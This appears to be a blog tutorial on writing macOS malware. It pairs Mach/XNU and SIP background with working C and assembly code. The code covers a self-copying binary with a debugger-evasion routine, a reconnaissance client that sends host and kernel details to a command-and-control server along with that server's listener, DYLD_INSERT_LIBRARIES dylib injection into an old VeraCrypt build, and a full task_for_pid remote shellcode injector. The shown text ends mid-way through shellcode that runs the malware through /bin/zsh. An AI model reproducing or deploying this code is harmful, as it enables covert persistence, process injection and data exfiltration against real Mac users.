In today’s post, We’ll explore the process of designing and developing malware for macOS, We’ll use a classic approach to understanding Apple’s internals, This article was originally written in late 2022 and tested on an older version of macOS. I kind of forgot about it until later this year when I revisited it. Before publishing, I decided to test the techniques on macOS Catalina and Monterey. We’ll also cover SIP and some security features. Keep in mind, the techniques you’ll see here are fairly well-known, involve common tricks, and are often heavily sandboxed. Most of them require root access to work.

The goal of this article is to introduce certain techniques and provide an overview of macOS architecture, encouraging further research rather than just delivering a typical ‘for educational purposes only’. I still plan to expand on this eventually, but don’t hold me to it just yet.

To follow along, you should have a basic understanding of C programming, and some familiarity with low-level assembly language. While the topics may be advanced, I’ll do my best to present them smoothly.

Alright, let’s move on.

Let’s start by understanding the macOS architecture and its security features. Next, we’ll take a look into the internals, covering key elements like the Mach API and the kernel, and we’ll walk through some basic system calls and easy to understand. After that, we’ll introduce a dummy malware sample. Later, we’ll explore code injection techniques and how they’re used in malware. To wrap up, we’ll demonstrate a basic implementation of shellcode injection. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.

Background

a little background from the internet, The Mac OS X kernel (xnu) is an operating system kernel with a unique lineage, merging the research-oriented Mach microkernel with the more traditional and contemporary FreeBSD monolithic kernel. The Mach microkernel combines a potent abstraction Mach message-based interprocess communication (IPC) with several cooperating servers to constitute the core of an operating system. Responsible for managing separate tasks within their own address spaces and comprising multiple threads, the Mach microkernel also features default servers that offer services like virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities such as user management, file systems, and networking. To address this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel, specifically its top-half (system call handlers, file systems, networking, etc.), ported to run atop the Mach microkernel.

Osx

First of all, before speaking about development, it is necessary to understand the basics of the OS. We are going to touch its security features with a special focus on SIP - System Integrity Protection.

System Integrity Protection (SIP) A fundamental method of protection for critical operating system files, directories, and processes from being modified or tampered with-in short, even from root users. It enforces write restrictions on the following protected areas: /System, /bin, /sbin, /usr-except /usr/local, which prevents unauthorized modifications that may damage your operating system. Second, SIP enforces strict security rules to system extensions and kernel drivers. For instance, the kexts should be signed either by Apple or by developers with a valid Developer ID. That means the system is only able to load trusted and signed extensions into the kernel, thus adding security.

As can be seen, the SIP is enabled, and that means the operating system is currently being protected by System Integrity Protection. There is a flag called “restricted” for some directories, which means those particular areas are protected by SIP. Protection by SIP does not reach all subdirectories of the SIP-protected directory.

For certain applications, macOS employs the use of firmlinks. These are special symbolic links that SIP does not break, so compatibility is maintained, but some functionality can be granted within SIP-protected directories. To applications and scripts, a firmlink is treated like any symbolic link, allowing them to perform their duties without having to make any special accommodations.

That will solve a lot of compatibility issues for both developers and users while still benefiting from SIP security protection. That creates a balance in the protection of the system and applications or script requirements that depend on symbolic links in macOS. A good example is a firmlink that might give write privilege to /usr/local, hence giving latitude for installing and managing software and scripts in that directory without breaking the security of system-protected areas.

macOS balances granting an application the permissions it needs to function properly while keeping the operating system secure. This is through the use of entitlements, which are types of permissions granted to applications by macOS in deciding which system resources the application can access. These entitlements typically reside in the Info.plist file of an application, which is part of the app’s bundle and contains metadata about the app.

Application configuration, settings, and preferences are typically stored in **plist files within macOS. Key-value pairs can be included in the format and saved in either XML or binary format.

<?xml version="1.0" encoding="UTF-8"?>  
<plist version="1.0">  
<dict>  
<key>com.apple.security.app-sandbox</key>  
<true/>  
<key>com.apple.security.files.user-selected.read-only</key>  
<true/>  
<key>com.apple.security.network.client</key>  
<true/>  
</dict>  
</plist>  
  

com.apple.security.app-sandbox: This is a sandboxing facility that enables applications
com.apple.security.files.user-selected.read-only: Provided to allow the application to access read-only properties to user-selected files.
com.apple.security.network.client: This enables the application to act like a network client.

More on this is Gatekeeper, Sandboxing, App Bundles, etc., but these are the important security mechanisms that concern us for development. Now let’s talk a little internals. You may wonder why internal architecture is so important to focus on. Even though I am not planning on developing a rk yet, knowing your OS from the developer side of things inside and out is kinda necessary. After all, we are writing software.

Mach API’s

Let’s take a quick look at Mach. It was initially designed as a kernel focused on communication and multiprocessing, with the goal of setting up the foundation for various operating systems. Mach used a microkernel architecture, keeping core OS services like file systems, I/O, memory management, and networking separate from the kernel.

The XNU kernel, which stands for “X is not UNIX,” powers macOS. Positioned at the heart of the system, XNU supports Darwin and the rest of the software stack.

XNU is a hybrid operating system, combining the minimalist Mach microkernel’s hardware/IO interface with elements from the FreeBSD kernel and its POSIX-compliant API. This blend can make understanding how programs map to processes in virtual memory on macOS a little tricky. For instance, the term “thread” might refer to either POSIX API pthreads from BSD or the basic unit of execution within a Mach task. Additionally, there are two different sets of syscalls, mapped to positive numbers (Mach) and negative numbers (BSD).

Mach provides a virtual machine interface that abstracts system hardware—a feature common to many operating systems. Its core kernel is designed to be simple and extensible, featuring an Inter-Process Communication (IPC) mechanism that supports many kernel services. Notably, Mach integrates IPC capabilities with its virtual memory subsystem, leading to optimizations and simplifications throughout the OS.

The term “tasks” is used instead of “processes.” Tasks are similar to processes in that they encompass all the resources needed to run a program. Technically, Mach calls its processes “tasks,” though the concept of a BSD-style process that includes a Mach task still exists. Resources within a task include:

A virtual address space
Inter-process communication (IPC) port rights
One or more threads

Ports serve as an inter-task communication mechanism, using structured messages to transmit information between tasks. Operating solely in kernel space, ports act like P.O. Boxes, albeit with restrictions on message senders. Ports are identified by Task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. supports two thread types (Mach and pthread), depending on whether the code originates from user or kernel mode. Mach threads reside at the OS’s lowest level in kernel-mode, while pthreads from the BSD realm execute programs in user-mode. (More in this, later)

Mach redefines the traditional Unix notion of a process into two components: a task and a thread. In the kernel, a BSD process aligns with a Mach task. A task serves as a framework for executing threads, encapsulating resources and defining a program’s protection boundary. Mach ports, versatile abstractions, facilitate IPC mechanisms and resource operations.

IPC messages in Mach are exchanged between threads for communication, carrying actual data or pointers to out-of-line data. Message transfer is asynchronous, with port capabilities exchanged through messages.

Mach’s virtual memory system encompasses machine-independent components like address maps and memory objects, alongside machine-dependent elements like the physical map. Memory objects serve as containers for data mapped into a task’s address space, managed by various pagers handling distinct memory types. Exception ports, assigned to each task and thread, facilitate exception handling, allowing multiple handlers to suspend affected threads, process exceptions, and resume or terminate threads accordingly.

Let’s explore the basics of Mach System Calls, including retrieving system information and performing code injection. This will provide a fundamental understanding of interacting with macOS, By the way, a system call is a function of the kernel invoked by a user space. It can involve tasks like writing to a file descriptor or exiting a program,

Baby Steps

If we check out the Mach IPC Interface or the Apple documentation, we’ll find a Mach system call that’s really useful for getting basic information about the host system. I also recommend taking a look at OS Internals, Volume I: User Space

It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Now, like a lot of Mach “info” calls, host_info() needs a flavor argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t host_info_count);

HOST_BASIC_INFO: Returns basic system information.
HOST_SCHED_INFO: Provides scheduler-related data.
HOST_PRIORITY_INFO: Offers scheduler-priority-related information.

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

if we want to learn more about system calls, we need something different. How about something that acts more like malware? But let’s keep it simple at first. We can start by writing a code that write a copy of itself to either /usr/bin/ or /Library/.

To achieve this kind of behavior, we need to use task operations because we need to control another process and access system processes. I found specific Mach system calls like pid_for_task(), task_for_pid(), task_name_for_pid(), and mach_task_self(), which allow conversion between Mach task ports and Unix PIDs. However, they essentially bypass the capability model, which means they are restricted on macOS due to UID checks, entitlements, SIP, etc., limiting their use, and are not documented as part of a public API and are privileged, typically accessible only by processes with elevated privileges like root or members of the procview group. This limitation poses a challenge because malware would need elevated privileges or execution on a privileged account to work unless obtained through various means.

Thus, we can’t use task_for_pid on Apple platform binaries due to SIP. However, if permitted, we would have the port and could essentially do anything we want including what I’m about to explain. Therefore, So for this example we’ll use mach_task_self() as it typically does not require privileges. It retrieves information about the current task, depending on the security policies enforced.

void hide_process() {
  mach_port_t task_self = mach_task_self();
  kern_return_t kr;

  // Less visible to debuggers and handlers.
  kr = task_set_exception_ports(
    task_self, 
    EXC_MASK_ALL, 
    MACH_PORT_NULL, 
    EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, 
    THREAD_STATE_NONE 
  );

  if (kr != KERN_SUCCESS) {
    exit(EXIT_FAILURE);
  }

  printf("Process is now hidden.\n");

}

the function obtains the task port for the current process using mach_task_self(), which essentially retrieves a send right to a task port. In the Mach kernel, a task port represents a task, and sending a message to this port enables actions to be performed on the corresponding task.

Next, to set the exception ports to disable debuggers and other forms of external monitoring. This is achieved through the task_set_exception_ports() function call. and any received messages should be directed to a null Mach port. The process then exits with a failure status.

int main(int argc, char *argv[]) {
    struct passwd *pw = getpwuid(getuid());
    const char *home_dir = pw->pw_dir;

    char home_file_path[PATH_MAX_LENGTH];
    snprintf(home_file_path, sizeof(home_file_path), "%s/.%s", home_dir, FILE_NAME);

    if (geteuid() == 0) {
        const char *system_file_path = "/usr/local/bin/" FILE_NAME;
        if (access(system_file_path, F_OK) != 0) {
            copy_file(argv[0], system_file_path);
        }
    } else {
        if (access(home_file_path, F_OK) != 0) {
            copy_file(argv[0], home_file_path);
            greet_user();
        }
    }

    // hide_process(); /* For show */
    // remove(argv[0]);

    return EXIT_SUCCESS;
}

So the logic is as follows: It first checks if it has root privileges by calling geteuid(). If it does, it attempts to copy itself to /usr/bin/, and if successful, it executes the copied binary. If it doesn’t have root privileges, it attempts to copy itself to ~/Library/ (the user's home directory). If successful, it prints "Hello, World!". After copying itself it calls hide_process(). Finally, it removes the original binary.

This is far from being a malware, but it but you can recognize and get familiarity working with the Mach API and conducting low-level system operations.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put a our little bad program into a debugger, and as you can see specially in the disassembly part there’s instructions correspond to our operation like /usr/bin/ also you can notice the cleanup operations are performed, such as deallocating port and exiting the program.

The Naive Way

After infecting a new host, let’s ensure our malware notifies us of its presence by sending information about the host. Although this method might seem amateurish, a malware shouldn’t connect to a Command & Control server (C2) initially - since we’re just exploring macOS as a new territory, it’s a starting point. We collect system information such as the system name, release version, machine architecture, hardware model, user ID, home directory, etc…, and then send this information to the C2. For retrieving or modifying information about the system and environment, we can make use of Developer Apple - sysctlbyname. This function enables us to retrieve specific system information, such as the cache line size, directly from the system kernel.

However, when it comes to System Owner/User Discovery, we typically access user-related data through standard POSIX interfaces like getpwuid(), relying on these interfaces as discussed before. To fetch the hardware model, we would replace "hw.cachelinesize" with "hw.model" in the sysctlbyname function call.

Next, we want to gather more information about the host, not just its hardware model. Now, you may wonder why we don’t just use the first example you introduced. Well, it’s simple. This is to showcase how we access user-related data through standard POSIX interfaces. However, if you want to introduce the hardware model in the above example, just

count = sizeof(model); kr = sysctlbyname("hw.model", model, &count, NULL, 0); EXIT_ON_MACH_ERROR("sysctl hw.model", 1);

we also wanna send some information like kernel version, for possible known vulnerabilities, to escalate, So here’s an example, we use the same function as to get hardware model

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
	send_data(sockfd, "\nKernel Version: ");
	send_data(sockfd, kernel_version);

Now let’s dump and send more information about the profile of the infected host, including details such as System Name, Architecture, Login shell, Home directory and any other relevant data that could aid in further exploiting or maintaining access to the compromised system, W’ll use function such as uname, getpwuid, and getgrgid, Let’s take a look at the code,

void system_info(int sockfd) {
  struct utsname sys_info;
  char kernel_version[BUF_SIZE];

  // Get system information
  if (uname( & sys_info) != 0) {
    send_error("Failed to get system information");
    return;
  }

  send_data(sockfd, "\nSystem Name: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nRelease Version: ");
  send_data(sockfd, sys_info.release);
  send_data(sockfd, "\nMachine Architecture: ");
  send_data(sockfd, sys_info.machine);
  send_data(sockfd, "\nOperating System: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nVersion: ");
  send_data(sockfd, sys_info.version);
}

So, the function is pretty self-explanatory; it simply provides a snapshot of the system and user environment, which is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection,

Even so, deploying a dummy malware can give attackers a lot of useful information that could be used for future, more targeted attacks or for exploiting vulnerabilities in both the kernel and user space. Such malware can be multi-staged to maintain stealth and keep a low profile. For example, the initial stage might involve spreading the malware throughout the system and lying in wait for the next stage to activate. These sophisticated attacks are advanced and tough to detect, especially on platforms like macOS, where malware can stay hidden for years, no more though!!

Another type of information gathering employed by macOS malware, as seen in some reports, involves ‘LOLBins’ (Living off the Land Binaries). You can program the malware to simply execute /usr/sbin/system_profiler -nospawn -detailLevel full

This command alone saves the trouble and provides all the information about a host that an attacker can gather. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? We use socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data, and file I/O functions such as popen() and fgets() for reliable reading and sending of data. It’s pretty simple.

The C2 server is also simple, designed solely for handling incoming connections. It won’t have any defensive mechanisms to hide itself from the system where it’s running, but this server is basic for show only. maybe some encryption, would be a good start,

The extraction module (ext) starts an autonomous thread listening for incoming connections from malware instances. Once connected, the module simply prints the content of the incoming connection (which is the information extracted by the client)

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected clients, and then closes the connection before resuming listening for new connections,

Collecting data from client ...

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Operating System: Darwin

Obviously, this will get flagged within seconds if there’s a security mechanism in place. Why, you may ask? Well, the behavior exhibited here screams malware from establishing a connection to sending system information and continuously receiving and executing commands from a remote server. The network traffic pattern alone is a red flag. Plus, the transmission of system information(User, OS version, Architecture, Installed App, …) immediately after connection establishment, and the good news is that most Mac users assume they’re safe by default, so they don’t entertain the idea that capable malware could go unnoticed.

This is just a tip and a simple overview of how dummy malware can serve as a learning tool before serving the actual malware.

Code Injection

Actually, exploring Code Injection deserves its own article, and I’ll include some resources at the end. However, for now, let’s focus on two techniques that I find quite effective. So, Let’s begin by introducing the first technique, which involves leveraging environment variables or DYLD_INSERT_LIBRARIES for code injection.

DYLD_INSERT_LIBRARIES is actually a powerful feature that allows users to preload dynamic libraries into applications, Both developers and attackers can inject code into running processes without modifying the original executable file is commonly used to intercept function calls, manipulate program behavior, or even introduce malicious functionality into legitimate application, As we gone see, It’s basically a colon separated list of dynamic libraries to load before the ones specified in the program. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules.

In simple term’s, it will load any dylibs you specify in this variable before the program loads, essentially injecting a dylib into the application, So for example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

As you can see we have a function foo() that prints to let us know that we successful injected a library and a system command that execute a shell to echo basically the same thing and that attribute((constructor)) marks the function run before the application’s main function, into which we injected the dylib, piece of cake right, But how do we know identify binaries vulnerable to environment variable injection, on that later, but first let’s just try it on one of our previous program, So just compile that code like any other program and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

et voilà, When affected, what happens is that it loads any dylibs specified in this variable before the program loads, essentially injecting a dylib into the application. This could potentially lead to privilege escalation, right? Not so fast on the Apple platform binaries. As of macOS 10.14, third-party developers can opt in to a hardened runtime for their application, which can prevent the injection of dylibs using this technique.

So, basically, we can still perform injection when the application is not defined as having a “Hardened Runtime” and therefore allows the injection of dylibs using the environment variable. Alternatively, when the binary is using a hardened runtime and the developer released it with the appropriate entitlements, let’s go over this one more time:

The “Disable-library-validation” entitlement allows any dylib to run on the binary even without checking who signed the file and the library. This permission usually exists in programs that allow community-written plugins.
The com.apple.security.cs.allow-dyld-environment-variables entitlement loosens the hardened runtime restrictions and allows the use of DYLD_INSERT_LIBRARIES to inject a library.

Alright on possible target application, For example to run this on Safari.app It won’t work, because is hardened and lacks the matching entitlement,

But that doesn’t mean the application isn’t hardened, as there are other Hardened Runtime features that might not be visible in the entitlements. To speed things up, I found that the version of Veracrypt I have doesn’t use Hardened Runtime, so I’ll use it as an example throughout this article! Now, let’s try injecting it, but first…

__attribute__((constructor))

static void customConstructor(int argc, const char **argv)
{
printf("Foo!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print ‘foo’ and log a message using the syslog() function, which logs an error message indicating successful injection of a dynamic library (dylib) along with the name of the program. Let’s try it. If we see the following output, it seems that we’ve successfully loaded the library:

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is hardened and lacks the matching entitlement, we won’t be able to load the library, and consequently, we won’t see the desired output.

However, some internal components of macOS expect threads to be created using the BSD APIs and have all Mach thread structures and pthread structures set up properly. This can present challenges, especially with changes introduced in macOS 10.14+

To address this issue, I came across a piece of code called inject.c, From my understanding, the transition from Mach thread APIs to pthread APIs in macOS, particularly concerning the initialization of thread structures, presents challenges. However, the discovery of the _pthread_create_from_mach_thread function provides an alternative for initializing pthread structures from bare Mach threads.

For those interested, I’ve included examples demonstrating how to inject code to call dlopen and load a dylib into a remote mach task: Gist 1 & Gist 2

Alright, let’s discuss the second technique. It’s similar to methods used on Windows, and one common approach is process injection, which is the ability for one process to execute code in a different process. In Windows, this is often utilized to evade detection by antivirus software, for example, through a technique known as DLL hijacking. This allows code to hide as part of a different executable. In macOS, this technique can have huge impact due to the differences in permissions between applications.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group, and flags that determine which users are allowed to read, write, or execute that file. Two processes running as the same user have the same permissions; it is assumed there is no security boundary between them. Users are considered security boundaries; processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was essentially the same security model as macOS until the introduction of .. yep, SIP (System Integrity Protection)

macOS Shellcode Injection

Alright, so we’re going to write a simple shellcode injection program where the malware’s host process injects shellcode into the memory of a remote process. But before we proceed, let’s write a simple shellcode.

Writing 64-bit assembly on macOS differs somewhat from ELF. Here, you just need to understand the macOS executable file format, known as Mach-O. However, for simplicity, we’ll stick with the x86_64 architecture and we can later use a linker for Mach-O executables.

A simple “Hello World” program starts by declaring two sections: .data and .text. The .data section is used for storing initialized data, while the .text section contains executable code. Then we define the _main function as the entry point of the program, followed by a reference point in the code, which we’ll call trick. The trick section will be followed by a call instruction that invokes the continue subroutine and pops the address of the string ‘Hello World!’. Also, if you notice in the code, we have a system call at the end that exits our program. The first syscall is for writing data.

section .data
section .text

global _main
	_main:

start:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	
trick:
	call continue
	db "Hello World!", 0, 0

Alright, it’s time to compile. I typically use NASM for assembling my code. Remember what I mentioned about using the linker to create Mach-O executables? Well, after assembling the code with NASM, we’ll need to link it using ld. This linker not only brings together the assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Now, to actually turn it into machine code that we can use for injection, it needs to be turned into a hexadecimal. This consists of a small series of bytes that represent executable machine code. simply represents the exact sequence of instructions that the processor will execute. For this, we can use objdump.

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`

If, for some reason, you can’t extract the shellcode solely relying on objdump, you can always script kiddy a simple py code, to parse the assembly,

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')
    
    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)
    
    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? To ensure its functionality, we should test whether we can perform a simple injection. One way to do this is by compiling the shellcode and storing it as a global variable within the executable’s __TEXT,__text section. We can achieve this by declaring the shellcode as a variable within the code itself,

const char output[] __attribute__((section("__TEXT,__text"))) =  "
\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01
\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05
\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00
\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c
\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

typedef int (*funcPtr)();

int main(int argc, char **argv)
{
    funcPtr ret = (funcPtr) output;
    (*ret)();

    return 0;
}

Alright, now that we have the shellcode, let’s start writing the actual injector. The main function seems like the natural starting point. The logic is simple: we take a single cmd arg, which should be the process ID (PID) of the target process to inject the shellcode into. Then, we obtain a handle to our task using task_for_pid(). Next, we’ll allocate a memory buffer in the remote task with mach_vm_allocate(). After that, we’ll write our shellcode to the remote buffer with mach_vm_write(). We’ll modify the memory permissions of the remote buffer with mach_vm_protect(). Then, we’ll update the remote thread context to point to the start of the shellcode with thread_create_running(). Finally, we’ll run our shellcode, which will print “Hello World”.

Remember our earlier discussion about the differences between a Mach task thread and a BSD pthread, and the task_for_pid() API call. In order to develop a utility that utilizes task_for_pid()

Note: not all sections of a program’s virtual memory permit their contents to be interpreted as code by the CPU (i.e., “marked executable”). Memory can be marked as readable (R), writable (W), executable (E), or some combination of the three. For instance, a page marked RW means one can read/write to these addresses in memory, but their contents may not be treated as executable by the CPU.

Executable memory regions are typically marked with the execute (E) permission, allowing the CPU to interpret the contents of these regions as machine instructions and execute them. This is essential for running programs, as the CPU needs to fetch instructions from memory and execute them.

However, allowing arbitrary memory regions to be executable can pose significant security risks, such as buffer overflow attacks or injection of malicious code. Therefore, modern operating systems employ memory protection mechanisms to restrict the execution of code to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can enforce security policies and prevent unauthorized execution of code. For example, writable memory regions that contain data should not be executable to prevent the execution of injected code. Conversely, executable code should not be writable to prevent tampering with the program’s instructions.

Alright, the entry point we converts the PID provided as a string to an integer and calls the inject_shellcode function to inject the shellcode into the target process using the provided PID,

We need to interact with the target process, so we declare a few variables to hold essential information. These include remote_task to represent the task port of the target process, remote_stack to store the address of the allocated memory for the remote stack within the target process, and shellcode_region to keep track of the memory region allocated for the shellcode.

Now, the process begins. We need to get permission to access the target process, so we use the task_for_pid function to obtain the task port. This allows us to manipulate the memory and threads of the target process.

With access granted, we proceed to allocate memory within the target process. We reserve space for both the remote stack and the shellcode using mach_vm_allocate. This ensures that we have a place to execute our code, Once memory is allocated, we write our shellcode into the allocated memory space of the target process using mach_vm_write. simply places our code where it needs to be executed.

// inject_shellcode
// 	 Inject shellcode into a target process. Allocate memory, write 
//          shellcode, set protections, and spawn a thread to execute it.
// Params:
//    pid_t pid                 - Target process ID.
//    unsigned char *shellcode  - Pointer to shellcode to inject.
//    size_t shellcode_size     - Size of shellcode in bytes.
// Returns: int                 - 0

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;                     
    mach_vm_address_t remote_stack = 0;   
    vm_region_t shellcode_region;          

    // Grab the task port for the given PID.
    task_for_pid(mach_task_self(), pid, &remote_task);
    mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);

    // Allocate memory for the shellcode
    mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    shellcode_region.size = shellcode_size;                     
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory.
    mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);

    // Create a remote thread to run the shellcode.
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));               
    thread_state.__rip = (uint64_t)shellcode_region.addr;         
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);   
    
    thread_act_t remote_thread;
    thread_create(remote_task, &remote_thread);             

    // Set the thread state to start execution.
    thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    thread_resume(remote_thread);                           

    printf("[+] Shellcode injected successfully!\n");
    mach_port_deallocate(mach_task_self(), remote_thread);         

    return 0; 
}

To ensure that our shellcode can run, we modify the memory permissions of the allocated memory region containing the shellcode. We use vm_protect to set the appropriate permissions, allowing for execution. Now, it’s time to execute our shellcode. We create a remote thread within the target process using thread_create. This thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the thread to execute our shellcode by setting the instruction pointer (rip) to the starting address of the shellcode and the stack pointer (rsp) to the allocated remote stack. Finally, we’re ready to execute our shellcode. We resume the remote thread using thread_resume, allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating that the shellcode was injected successfully. We also clean up any resources used during the injection process by deallocating Mach ports. And that’s it! The entire process of injecting shellcode into a target process on macOS using Mach APIs.

In our injector, we’re injecting shellcode into a target process using Mach APIs in macOS. Now, one significant difference between POSIX threads and Mach threads comes into play here. POSIX threads utilize the thread local storage (TLS) data structure, which is crucial for managing thread-specific data. However, Mach threads don’t have this concept of TLS.

Now, when we inject our shellcode into the target process and create a remote thread to execute it, we can’t simply point the instruction pointer in the thread context struct and expect everything to work smoothly. Why? Because our shellcode, which is essentially unmanaged code, needs to run in a controlled environment, and transitioning from a Mach thread directly to executing our shellcode might cause issues.

So, to prevent potential crashes or errors, we need to ensure that our shellcode is executed within the context of a fully-fledged POSIX thread. This means that as part of our injection process, we have to somehow promote our shellcode from being executed within the context of a base Mach thread to being executed within the context of a POSIX thread. By doing this, we create a more stable environment for our shellcode to execute, ensuring that when the target process resumes its execution at the start of our shellcode, it does so without any issues. This promotion process is essential for the successful execution of our injected shellcode in user mode without causing crashes or unexpected behavior.

However, let’s shift our focus now. Remember the code we previously developed to transmit system data to the C2 server? What if we inject shellcode into the Veracrypt process to execute our dummy malware, enabling it to establish communication with the C2 server and transmit host data?

A quick note: the version of VeraCrypt used here for this example is quite old, so any protection we discussed or covered doesn’t apply to this version. We’ll talk a little more about this in part 0x02.

To execute a shell command, considering I’m running zsh, we need to trigger a syscall to run /bin/zsh -c. For this, we need to utilize execve. What does this do? Simply put, it executes the program referenced by _pathname, which in our case will be the path to our dummy malware executable.

Alright, let’s proceed by writing a simple assembly code to execute /bin/zsh -c '/Users/foo/dummy'. First, we’ll set up a register (rbx) and load the string '/bin/zsh' into it. Once this string is pushed onto the stack, we’ll proceed to load the ASCII values for -c into the lower 16 bits of the rax register. After pushing this -c flag onto the stack, we’ll set the rbx register to point to the -c flag on the stack, as it will be necessary later during the syscall preparation.

Any additional details will be described in comments within the code. At the end of this section, there’s an indirect jump facilitating the execution of subsequent instructions. This jump redirects the program flow to the address stored in the exec subroutine, ensuring the continuity of execution.

global _main

_main:
    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh\0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
